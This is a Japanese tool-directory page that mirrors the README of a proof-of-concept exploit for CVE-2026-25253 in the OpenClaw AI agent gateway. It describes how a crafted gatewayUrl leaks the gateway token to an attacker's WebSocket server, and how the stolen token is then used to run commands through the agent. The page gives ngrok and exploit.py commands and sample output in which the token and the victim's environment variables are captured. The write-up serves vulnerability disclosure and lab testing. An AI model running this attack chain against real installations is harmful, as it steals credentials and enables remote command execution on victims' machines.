Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-25253 — OpenClawのCVE-2026-25253に対する概念実証エクスプロイト:細工されたgatewayUrlがControl UIのゲートウェイトークンを窃取し、不正なゲートウェイアクセスとワンクリックでのリモートコード実行を可能にする。 | Kitploit
ツール/GitHubGitHub/yym8538/cve-2026-25253
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出ウェブセキュリティペネトレーションテスト認証レッドチーミングリモートアクセスツール
GitHubyym8538/cve-2026-25253

CVE-2026-25253

OpenClawのCVE-2026-25253に対する概念実証エクスプロイト:細工されたgatewayUrlがControl UIのゲートウェイトークンを窃取し、不正なゲートウェイアクセスとワンクリックでのリモートコード実行を可能にする。

141ヶ月前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-25253 OpenClaw ワンクリックRCE

★ CVE-2026-25253 OpenClaw ワンクリックリモートコード実行 PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

概要

CVE-2026-25253 : OpenClaw 認証トークン窃取の脆弱性

説明: OpenClaw(別名 clawdbot または Moltbot)は v2026.1.29 より前のバージョンにおいて、細工された gatewayUrl クエリ文字列値を Control UI に渡すことで、保存されたゲートウェイ認証トークンを窃取される脆弱性があります。Control UI は検証やユーザーの確認なしに自動的に WebSocket 接続を確立します。これにより、不正なゲートウェイアクセスおよびワンクリックでのリモートコード実行につながる可能性があります。

要件

  • Docker(Windows では Docker Desktop)
  • Python 3.x(攻撃側)

ファイル

  • Dockerfile — OpenClaw の脆弱な環境をビルドする
  • templates/ — エクスプロイトで使用される悪意のある Web ページ
  • config.txt — 被害者環境で使用される OpenClaw 設定
  • exploit.py — エクスプロイトサーバー
  • requirements.txt — PoC の依存関係

環境構築

  1. Docker イメージをビルド
docker build -t openclaw-vuln .
  1. 環境を実行(Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. SSH トンネルを作成
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • パスワード: openclawlab
  1. OpenClaw Control UI にアクセス ブラウザで以下の URL を開く
http://127.0.0.1:18789/
  1. Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 を入力
  2. Connect をクリック
  3. Config タブを開く
  4. config.txt の内容を貼り付ける
  5. API キーフィールドを自分の OpenAI API キーに置き換える
  6. 設定を保存
  7. エージェントが正常に応答することを確認する

概念実証(PoC)

  1. 依存関係をインストール(攻撃側)
pip3 install -r requirements.txt
  1. エクスプロイトサーバーを HTTPS で公開
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • 生成された転送ホスト名をコピーする
  1. エクスプロイトサーバーを実行
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

例:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. 攻撃をトリガー
  1. エクスプロイトサーバーが公開している悪意のあるページを開く
  2. 被害者のページ操作をシミュレートする
  3. ブラウザからエクスプロイトフローをトリガーする

攻撃フロー

  1. 悪意のある URL が被害者の Control UI の gatewayUrl を変更する
  2. ブラウザが攻撃者制御の WebSocket エンドポイントに自動的に接続する
  3. ゲートウェイ認証トークンが攻撃者に漏洩する
  4. 悪意のあるページが盗んだトークンを使用して、被害者のローカル OpenClaw ゲートウェイへの新しい WebSocket 接続を開く
  5. エージェントを通じてコマンド実行リクエストが送信される
  6. 実行結果が攻撃者サーバーに返される

期待される結果

  • 被害者のブラウザが悪意のある WebSocket フローにリダイレクトされる
  • ゲートウェイ認証トークンが攻撃者に取得される
  • 攻撃者が OpenClaw を通じてコマンド実行リクエストを送信できる
  • コマンド出力が攻撃者サーバーに返される

出力例

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

注意事項

  • この PoC は OpenClaw 2026.1.24-1 を対象としています
  • エクスプロイトチェーンは Control UI の脆弱な gatewayUrl 処理に依存しています
  • リモートの被害者にアクセスするには、悪意のあるページを HTTPS で提供する必要があります
  • ローカルの OpenClaw ゲートウェイには、被害者のブラウザをブリッジとして経由して到達します

EQST Insight

当社は CVE およびマルウェア分析を毎月公開しています。ご興味があれば、以下のリンクから当社の出版物をご覧ください。

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
ツールをダウンロード